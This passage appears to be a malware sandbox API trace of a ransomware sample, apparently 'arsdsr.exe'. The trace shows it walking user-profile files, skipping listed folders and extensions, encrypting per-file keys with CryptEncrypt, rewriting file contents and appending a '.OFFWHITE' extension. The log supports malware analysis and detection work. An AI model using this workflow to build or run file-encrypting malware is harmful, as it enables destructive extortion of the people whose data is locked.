lpString2="KERNEL32.DLL") returned 0 [0153.163] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565f98*, pdwDataLen=0x295e98c*=0x10, dwBufLen=0x100 | out: pbData=0x565f98*, pdwDataLen=0x295e98c*=0x100) returned 1 [0153.163] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.163] SetLastError (dwErrCode=0x0) [0153.163] WriteFile (in: hFile=0x220, lpBuffer=0x565e90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x565e90*, lpNumberOfBytesWritten=0x295ebcc*=0x100, lpOverlapped=0x0) returned 1 [0153.165] GetLastError () returned 0x0 [0153.165] GetLastError () returned 0x0 [0153.165] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x100, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.165] WriteFile (in: hFile=0x220, lpBuffer=0x565f98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x565f98*, lpNumberOfBytesWritten=0x295ebcc*=0x100, lpOverlapped=0x0) returned 1 [0153.165] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x200, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.165] WriteFile (in: hFile=0x220, lpBuffer=0x543e18*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x543e18*, lpNumberOfBytesWritten=0x295ebcc*=0x8, lpOverlapped=0x0) returned 1 [0153.165] GetProcessHeap () returned 0x500000 [0153.165] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x0) returned 0x543e28 [0153.165] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.165] ReadFile (in: hFile=0x220, lpBuffer=0x543e28, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x543e28*, lpNumberOfBytesRead=0x295ebc0*=0x0, lpOverlapped=0x0) returned 1 [0153.165] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.165] WriteFile (in: hFile=0x220, lpBuffer=0x543e28*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x543e28*, lpNumberOfBytesWritten=0x295ebcc*=0x0, lpOverlapped=0x0) returned 1 [0153.165] GetProcessHeap () returned 0x500000 [0153.165] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543e28 | out: hHeap=0x500000) returned 1 [0153.165] CloseHandle (hObject=0x220) returned 1 [0153.166] GetProcessHeap () returned 0x500000 [0153.166] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565e90 | out: hHeap=0x500000) returned 1 [0153.166] GetProcessHeap () returned 0x500000 [0153.166] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565f98 | out: hHeap=0x500000) returned 1 [0153.166] GetProcessHeap () returned 0x500000 [0153.166] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b68 | out: hHeap=0x500000) returned 1 [0153.166] GetProcessHeap () returned 0x500000 [0153.166] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b80 | out: hHeap=0x500000) returned 1 [0153.166] lstrcpyW (in: lpString1=0x295e9b8, lpString2="C:/Users\\Default\\NTUSER.DAT.LOG2" | out: lpString1="C:/Users\\Default\\NTUSER.DAT.LOG2") returned="C:/Users\\Default\\NTUSER.DAT.LOG2" [0153.166] lstrcatW (in: lpString1="C:/Users\\Default\\NTUSER.DAT.LOG2", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\Default\\NTUSER.DAT.LOG2.OFFWHITE") returned="C:/Users\\Default\\NTUSER.DAT.LOG2.OFFWHITE" [0153.166] MoveFileW (lpExistingFileName="C:/Users\\Default\\NTUSER.DAT.LOG2" (normalized: "c:\\users\\default\\ntuser.dat.log2"), lpNewFileName="C:/Users\\Default\\NTUSER.DAT.LOG2.OFFWHITE" (normalized: "c:\\users\\default\\ntuser.dat.log2.offwhite")) returned 1 [0153.167] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xf8d30919, ftCreationTime.dwHighDateTime=0x1ca043d, ftLastAccessTime.dwLowDateTime=0xf8d30919, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0xf8ead6dc, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0153.167] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2=".") returned 1 [0153.167] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="..") returned 1 [0153.167] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="...") returned 1 [0153.167] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="windows") returned -1 [0153.167] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="$recycle.bin") returned 1 [0153.167] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="rsa") returned -1 [0153.167] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="ntuser.dat") returned 1 [0153.167] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="programdata") returned -1 [0153.167] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="appdata") returned 1 [0153.167] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="program files") returned -1 [0153.167] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="program files (x86)") returned -1 [0153.167] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\Default\\" | out: lpString1="C:/Users\\Default\\") returned="C:/Users\\Default\\" [0153.167] lstrcatW (in: lpString1="C:/Users\\Default\\", lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" | out: lpString1="C:/Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned="C:/Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" [0153.167] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.168] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.168] PathFindExtensionW (pszPath="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned=".blf" [0153.168] lstrcmpiW (lpString1=".blf", lpString2=".exe") returned -1 [0153.168] lstrcmpiW (lpString1=".blf", lpString2=".log") returned -1 [0153.168] lstrcmpiW (lpString1=".blf", lpString2=".cab") returned -1 [0153.168] lstrcmpiW (lpString1=".blf", lpString2=".cmd") returned -1 [0153.168] lstrcmpiW (lpString1=".blf", lpString2=".com") returned -1 [0153.168] lstrcmpiW (lpString1=".blf", lpString2=".cpl") returned -1 [0153.168] lstrcmpiW (lpString1=".blf", lpString2=".ini") returned -1 [0153.168] lstrcmpiW (lpString1=".blf", lpString2=".dll") returned -1 [0153.168] lstrcmpiW (lpString1=".blf", lpString2=".url") returned -1 [0153.168] lstrcmpiW (lpString1=".blf", lpString2=".ttf") returned -1 [0153.168] lstrcmpiW (lpString1=".blf", lpString2=".mp3") returned -1 [0153.168] lstrcmpiW (lpString1=".blf", lpString2=".pif") returned -1 [0153.169] lstrcmpiW (lpString1=".blf", lpString2=".mp4") returned -1 [0153.169] lstrcmpiW (lpString1=".blf", lpString2=".OFFWHITE") returned -1 [0153.169] lstrcmpiW (lpString1=".blf", lpString2=".msi") returned -1 [0153.169] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0153.169] GetProcessHeap () returned 0x500000 [0153.169] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x543e28 [0153.169] CreateFileW (lpFileName="C:/Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0153.169] GetFileSizeEx (in: hFile=0x220, lpFileSize=0x295ebe0 | out: lpFileSize=0x295ebe0*=65536) returned 1 [0153.169] GetProcessHeap () returned 0x500000 [0153.169] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b80 [0153.169] GetProcessHeap () returned 0x500000 [0153.169] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b68 [0153.169] GetProcessHeap () returned 0x500000 [0153.169] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565f98 [0153.169] GetProcessHeap () returned 0x500000 [0153.170] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565e90 [0153.170] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.170] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.170] SystemFunction036 (in: RandomBuffer=0x543b80, RandomBufferLength=0x10 | out: RandomBuffer=0x543b80) returned 1 [0153.170] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.170] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.170] SystemFunction036 (in: RandomBuffer=0x543b68, RandomBufferLength=0x10 | out: RandomBuffer=0x543b68) returned 1 [0153.170] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.170] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.170] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565f98*, pdwDataLen=0x295e990*=0x10, dwBufLen=0x100 | out: pbData=0x565f98*, pdwDataLen=0x295e990*=0x100) returned 1 [0153.170] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.170] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.170] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565e90*, pdwDataLen=0x295e98c*=0x10, dwBufLen=0x100 | out: pbData=0x565e90*, pdwDataLen=0x295e98c*=0x100) returned 1 [0153.170] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x10000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.171] SetLastError (dwErrCode=0x0) [0153.171] WriteFile (in: hFile=0x220, lpBuffer=0x565f98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x565f98*, lpNumberOfBytesWritten=0x295ebcc*=0x100, lpOverlapped=0x0) returned 1 [0153.172] GetLastError () returned 0x0 [0153.172] GetLastError () returned 0x0 [0153.172] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x10100, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.172] WriteFile (in: hFile=0x220, lpBuffer=0x565e90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x565e90*, lpNumberOfBytesWritten=0x295ebcc*=0x100, lpOverlapped=0x0) returned 1 [0153.172] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x10200, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.172] WriteFile (in: hFile=0x220, lpBuffer=0x543e28*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x543e28*, lpNumberOfBytesWritten=0x295ebcc*=0x8, lpOverlapped=0x0) returned 1 [0153.172] GetProcessHeap () returned 0x500000 [0153.172] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10000) returned 0x5667c8 [0153.172] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.172] ReadFile (in: hFile=0x220, lpBuffer=0x5667c8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5667c8*, lpNumberOfBytesRead=0x295ebc0*=0x10000, lpOverlapped=0x0) returned 1 [0153.178] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.178] WriteFile (in: hFile=0x220, lpBuffer=0x5667c8*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5667c8*, lpNumberOfBytesWritten=0x295ebcc*=0x10000, lpOverlapped=0x0) returned 1 [0153.179] GetProcessHeap () returned 0x500000 [0153.179] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5667c8 | out: hHeap=0x500000) returned 1 [0153.179] CloseHandle (hObject=0x220) returned 1 [0153.179] GetProcessHeap () returned 0x500000 [0153.179] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565f98 | out: hHeap=0x500000) returned 1 [0153.179] GetProcessHeap () returned 0x500000 [0153.179] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565e90 | out: hHeap=0x500000) returned 1 [0153.179] GetProcessHeap () returned 0x500000 [0153.179] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b80 | out: hHeap=0x500000) returned 1 [0153.179] GetProcessHeap () returned 0x500000 [0153.179] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b68 | out: hHeap=0x500000) returned 1 [0153.179] lstrcpyW (in: lpString1=0x295e9b8, lpString2="C:/Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" | out: lpString1="C:/Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned="C:/Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" [0153.179] lstrcatW (in: lpString1="C:/Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.OFFWHITE") returned="C:/Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.OFFWHITE" [0153.179] MoveFileW (lpExistingFileName="C:/Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf"), lpNewFileName="C:/Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.OFFWHITE" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf.offwhite")) returned 1 [0153.180] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xf8da2d3a, ftCreationTime.dwHighDateTime=0x1ca043d, ftLastAccessTime.dwLowDateTime=0xf8da2d3a, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0xf8e8757c, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0153.181] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2=".") returned 1 [0153.181] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="..") returned 1 [0153.181] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="...") returned 1 [0153.181] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="windows") returned -1 [0153.181] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="$recycle.bin") returned 1 [0153.181] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="rsa") returned -1 [0153.181] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="ntuser.dat") returned 1 [0153.181] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="programdata") returned -1 [0153.181] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="appdata") returned 1 [0153.181] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="program files") returned -1 [0153.181] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="program files (x86)") returned -1 [0153.181] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\Default\\" | out: lpString1="C:/Users\\Default\\") returned="C:/Users\\Default\\" [0153.181] lstrcatW (in: lpString1="C:/Users\\Default\\", lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" | out: lpString1="C:/Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned="C:/Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" [0153.181] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.181] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.181] PathFindExtensionW (pszPath="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned=".regtrans-ms" [0153.181] lstrcmpiW (lpString1=".regtrans-ms", lpString2=".exe") returned 1 [0153.181] lstrcmpiW (lpString1=".regtrans-ms", lpString2=".log") returned 1 [0153.181] lstrcmpiW (lpString1=".regtrans-ms", lpString2=".cab") returned 1 [0153.181] lstrcmpiW (lpString1=".regtrans-ms", lpString2=".cmd") returned 1 [0153.181] lstrcmpiW (lpString1=".regtrans-ms", lpString2=".com") returned 1 [0153.181] lstrcmpiW (lpString1=".regtrans-ms", lpString2=".cpl") returned 1 [0153.181] lstrcmpiW (lpString1=".regtrans-ms", lpString2=".ini") returned 1 [0153.181] lstrcmpiW (lpString1=".regtrans-ms", lpString2=".dll") returned 1 [0153.181] lstrcmpiW (lpString1=".regtrans-ms", lpString2=".url") returned -1 [0153.181] lstrcmpiW (lpString1=".regtrans-ms", lpString2=".ttf") returned -1 [0153.182] lstrcmpiW (lpString1=".regtrans-ms", lpString2=".mp3") returned 1 [0153.182] lstrcmpiW (lpString1=".regtrans-ms", lpString2=".pif") returned 1 [0153.182] lstrcmpiW (lpString1=".regtrans-ms", lpString2=".mp4") returned 1 [0153.182] lstrcmpiW (lpString1=".regtrans-ms", lpString2=".OFFWHITE") returned 1 [0153.182] lstrcmpiW (lpString1=".regtrans-ms", lpString2=".msi") returned 1 [0153.182] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0153.182] GetProcessHeap () returned 0x500000 [0153.182] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x543e38 [0153.182] CreateFileW (lpFileName="C:/Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0153.182] GetFileSizeEx (in: hFile=0x220, lpFileSize=0x295ebe0 | out: lpFileSize=0x295ebe0*=524288) returned 1 [0153.182] GetProcessHeap () returned 0x500000 [0153.182] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b68 [0153.182] GetProcessHeap () returned 0x500000 [0153.182] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b80 [0153.182] GetProcessHeap () returned 0x500000 [0153.183] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565e90 [0153.183] GetProcessHeap () returned 0x500000 [0153.183] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565f98 [0153.183] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.183] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.183] SystemFunction036 (in: RandomBuffer=0x543b68, RandomBufferLength=0x10 | out: RandomBuffer=0x543b68) returned 1 [0153.183] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.183] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.183] SystemFunction036 (in: RandomBuffer=0x543b80, RandomBufferLength=0x10 | out: RandomBuffer=0x543b80) returned 1 [0153.183] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.183] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.183] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565e90*, pdwDataLen=0x295e990*=0x10, dwBufLen=0x100 | out: pbData=0x565e90*, pdwDataLen=0x295e990*=0x100) returned 1 [0153.183] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.183] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.183] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565f98*, pdwDataLen=0x295e98c*=0x10, dwBufLen=0x100 | out: pbData=0x565f98*, pdwDataLen=0x295e98c*=0x100) returned 1 [0153.184] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x80000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.184] SetLastError (dwErrCode=0x0) [0153.184] WriteFile (in: hFile=0x220, lpBuffer=0x565e90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x565e90*, lpNumberOfBytesWritten=0x295ebcc*=0x100, lpOverlapped=0x0) returned 1 [0153.185] GetLastError () returned 0x0 [0153.185] GetLastError () returned 0x0 [0153.185] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x80100, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.185] WriteFile (in: hFile=0x220, lpBuffer=0x565f98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x565f98*, lpNumberOfBytesWritten=0x295ebcc*=0x100, lpOverlapped=0x0) returned 1 [0153.185] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x80200, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.185] WriteFile (in: hFile=0x220, lpBuffer=0x543e38*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x543e38*, lpNumberOfBytesWritten=0x295ebcc*=0x8, lpOverlapped=0x0) returned 1 [0153.185] GetProcessHeap () returned 0x500000 [0153.185] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x80000) returned 0x2a60020 [0153.186] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.186] ReadFile (in: hFile=0x220, lpBuffer=0x2a60020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x2a60020*, lpNumberOfBytesRead=0x295ebc0*=0x80000, lpOverlapped=0x0) returned 1 [0153.242] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.242] WriteFile (in: hFile=0x220, lpBuffer=0x2a60020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x2a60020*, lpNumberOfBytesWritten=0x295ebcc*=0x80000, lpOverlapped=0x0) returned 1 [0153.244] GetProcessHeap () returned 0x500000 [0153.244] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2a60020 | out: hHeap=0x500000) returned 1 [0153.249] CloseHandle (hObject=0x220) returned 1 [0153.249] GetProcessHeap () returned 0x500000 [0153.249] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565e90 | out: hHeap=0x500000) returned 1 [0153.249] GetProcessHeap () returned 0x500000 [0153.250] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565f98 | out: hHeap=0x500000) returned 1 [0153.250] GetProcessHeap () returned 0x500000 [0153.250] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b68 | out: hHeap=0x500000) returned 1 [0153.250] GetProcessHeap () returned 0x500000 [0153.250] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b80 | out: hHeap=0x500000) returned 1 [0153.250] lstrcpyW (in: lpString1=0x295e9b8, lpString2="C:/Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" | out: lpString1="C:/Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned="C:/Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" [0153.250] lstrcatW (in: 